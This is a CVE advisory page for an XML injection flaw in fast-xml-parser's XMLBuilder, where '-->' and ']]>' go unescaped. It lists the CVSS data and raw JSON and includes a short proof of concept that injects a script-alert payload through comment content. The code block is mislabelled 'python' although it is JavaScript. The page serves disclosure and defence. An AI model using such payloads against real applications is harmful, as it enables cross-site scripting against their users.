Security Vulnerability Report
中文
CVE-2026-41650 CVSS 6.1 MEDIUM

CVE-2026-41650

Published: 2026-05-07 15:16:08
Last Modified: 2026-05-07 16:16:20
Source: [email protected]

Description

fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the "-->" sequence in comment content or the "]]>" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

fast-xml-parser < 5.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
const { XMLBuilder } = require('fast-xml-parser'); // Vulnerable version < 5.7.0 // Malicious input containing the closing sequence for comments const maliciousInput = "This is a comment --> <script>alert('XSS')</script> <!"; const data = { root: { comment: maliciousInput } }; const builder = new XMLBuilder(); const xmlOutput = builder.build(data); console.log(xmlOutput); // Output will be: <root><!--This is a comment --> <script>alert('XSS')</script> <!--></root>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41650", "sourceIdentifier": "[email protected]", "published": "2026-05-07T15:16:07.767", "lastModified": "2026-05-07T16:16:20.080", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the \"-->\" sequence in comment content or the \"]]>\" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-91"}]}], "references": [{"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0", "source": "[email protected]"}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", "source": "[email protected]"}, {"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.